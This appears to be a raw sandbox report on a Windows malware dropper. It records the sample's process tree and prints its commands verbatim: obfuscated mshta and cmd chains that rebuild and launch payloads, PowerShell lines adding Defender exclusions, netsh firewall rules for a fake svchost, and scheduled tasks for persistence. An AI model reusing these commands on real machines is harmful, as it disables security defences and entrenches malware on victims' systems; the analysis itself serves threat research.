PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	tG94gZUleeBFo8SDyi6butFz.exe
PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	tG94gZUleeBFo8SDyi6butFz.exe
PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	tG94gZUleeBFo8SDyi6butFz.exe
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XMGMTu3eQAvQPR86eRMXlDO9.exe
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XMGMTu3eQAvQPR86eRMXlDO9.exe
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XMGMTu3eQAvQPR86eRMXlDO9.exe
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	o6NHz5BzimLqOLMlh9XEgPbX.exe
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	o6NHz5BzimLqOLMlh9XEgPbX.exe
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	o6NHz5BzimLqOLMlh9XEgPbX.exe
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	ZvQmBbFSxCcYQP4fGiwTawkt.exe
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	ZvQmBbFSxCcYQP4fGiwTawkt.exe
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	ZvQmBbFSxCcYQP4fGiwTawkt.exe
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cTOmx3wyJ995falPyP_CHHr6.exe
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cTOmx3wyJ995falPyP_CHHr6.exe
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cTOmx3wyJ995falPyP_CHHr6.exe
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	KdlTj_CCMiXvvrf22JrhXXT5.exe
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	KdlTj_CCMiXvvrf22JrhXXT5.exe
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	KdlTj_CCMiXvvrf22JrhXXT5.exe
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	yJqr3GGVaG4To30s0MDWLG61.exe
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	yJqr3GGVaG4To30s0MDWLG61.exe
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	yJqr3GGVaG4To30s0MDWLG61.exe
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	dsqTtt9nQpWwz1yYMBAEipS6.exe
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	dsqTtt9nQpWwz1yYMBAEipS6.exe
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	dsqTtt9nQpWwz1yYMBAEipS6.exe
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Gn5a2G1hE46fGK_8y4mb1keQ.exe
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Gn5a2G1hE46fGK_8y4mb1keQ.exe
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Gn5a2G1hE46fGK_8y4mb1keQ.exe
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	kMCLvaZxUoL4ETDwWQqOc6MX.exe
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	kMCLvaZxUoL4ETDwWQqOc6MX.exe
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	kMCLvaZxUoL4ETDwWQqOc6MX.exe
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	33CEtghZf4kJPxQoBSqEUgkF.exe
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	33CEtghZf4kJPxQoBSqEUgkF.exe
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	33CEtghZf4kJPxQoBSqEUgkF.exe
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cBHStp1tUjbmpWGPeFPixzx7.exe
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cBHStp1tUjbmpWGPeFPixzx7.exe
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cBHStp1tUjbmpWGPeFPixzx7.exe
PID 1436 wrote to memory of 4760	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	IDyIlZ0vcJMZmpFNQrobzffX.exe
PID 1436 wrote to memory of 4760	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	IDyIlZ0vcJMZmpFNQrobzffX.exe
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	LPvnU5MCa7evfTEqGJQeEKaS.exe
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	LPvnU5MCa7evfTEqGJQeEKaS.exe
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	LPvnU5MCa7evfTEqGJQeEKaS.exe
PID 1436 wrote to memory of 2172	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	D9RJLCLd2f8688ZYCUxUkMQi.exe

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory

PID:1436

C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe

"C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"

Executes dropped EXE
Suspicious behavior: EnumeratesProcesses

PID:4728

C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe

"C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of SetThreadContext

PID:4492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

PID:5324

C:\Users\Admin\AppData\Local\Temp\fl.exe

"C:\Users\Admin\AppData\Local\Temp\fl.exe"

PID:4520

C:\Users\Admin\AppData\Local\Temp\Curarization.exe

"C:\Users\Admin\AppData\Local\Temp\Curarization.exe"

PID:1696

C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe

"C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"

Executes dropped EXE

PID:4752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 292

Program crash

PID:6088

C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe

"C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"

Executes dropped EXE

PID:4624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 296

Program crash

PID:6084

C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe

"C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"

Executes dropped EXE

PID:2680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 300

Program crash

PID:5968

C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe

"C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken

PID:1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1984

Program crash

PID:3204

C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe

"C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger

PID:4936

C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe

"C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"

Executes dropped EXE

PID:4640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 276

Program crash

PID:5804

C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe

"C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"

Executes dropped EXE

PID:768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 300

Program crash

PID:5440

C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe

"C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken

PID:3944

C:\Users\Admin\AppData\Roaming\2905016.exe

"C:\Users\Admin\AppData\Roaming\2905016.exe"

Executes dropped EXE

PID:6140

C:\Users\Admin\AppData\Roaming\3915497.exe

"C:\Users\Admin\AppData\Roaming\3915497.exe"

PID:5116

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

PID:5264

C:\Users\Admin\AppData\Roaming\1955104.exe

"C:\Users\Admin\AppData\Roaming\1955104.exe"

PID:5128

C:\Users\Admin\AppData\Roaming\1210874.exe

"C:\Users\Admin\AppData\Roaming\1210874.exe"

PID:5720

C:\Users\Admin\AppData\Roaming\8799358.exe

"C:\Users\Admin\AppData\Roaming\8799358.exe"

PID:1528

C:\Users\Admin\AppData\Roaming\250902.exe

"C:\Users\Admin\AppData\Roaming\250902.exe"

PID:3472

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\250902.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\250902.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )

PID:2032

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\250902.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\250902.exe" ) do taskkill /F /Im "%~Nxk"

PID:2424

C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE

kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ

PID:4488

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )

PID:2360

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"

PID:3300

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )

PID:4732

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM

PID:5528

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

PID:3628

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"

PID:4564

C:\Windows\SysWOW64\control.exe

control .\GKq1GTV.ZnM

PID:1320

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM

PID:2664

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /Im "250902.exe"

Kills process with taskkill

PID:5772

C:\Users\Admin\AppData\Roaming\848820.exe

"C:\Users\Admin\AppData\Roaming\848820.exe"

PID:4940

C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe

"C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"

Executes dropped EXE

PID:4400

C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe

"C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"

Executes dropped EXE
Drops file in Program Files directory

PID:2964

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Creates scheduled task(s)

PID:5608

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Creates scheduled task(s)

PID:3792

C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe

"C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"

PID:5424

C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe

"C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"

PID:504

C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe

"C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"

PID:4080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 300

Program crash

PID:4172

C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe

"C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"

PID:3036

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

PID:3492

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ) do taskkill -f -iM "%~NxM"

PID:1068

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe

..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

PID:5636

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

PID:456

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

PID:3660

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -iM "wcnBXcNqNjGhlzUr2QOQS7bQ.exe"

Kills process with taskkill

PID:104

C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe

"C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"

PID:5244

C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe

"C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"

PID:5044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 1728

Program crash

PID:1560

C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe

"C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"

PID:2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 300

Program crash

PID:2156

C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe

"C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"

PID:2164

C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe

"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"

Executes dropped EXE

PID:5116

C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe

"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe" -u

PID:2212

C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe

"C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"

PID:5184

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1

PID:2852

C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe

"C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"

PID:4140

C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp" /SL5="$402A8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"

PID:2568

C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe

"C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger

PID:884

C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe

"C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger

PID:3736

C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe

"C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"

Executes dropped EXE

PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\

PID:5688

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

PID:3184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \

PID:4912

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes

PID:5348

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM

Suspicious use of SetThreadContext
Creates scheduled task(s)

PID:3312

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

PID:768

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes

PID:5900

C:\Windows\System\svchost.exe

"C:\Windows\System\svchost.exe" formal

PID:5736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\

PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \

PID:5876

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes

PID:2032

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes

PID:5944

C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe

"C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger

PID:4532

C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe

"C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"

Executes dropped EXE

PID:4196

C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe

"C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"

Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled

PID:5036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

PID:2044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 560

Drops file in Windows directory
Program crash
Suspicious use of AdjustPrivilegeToken

PID:5832

C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe

"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"

Executes dropped EXE

PID:3312

C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe

"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"

Executes dropped EXE
Checks SCSI registry key(s)

PID:6048

C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe

"C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"

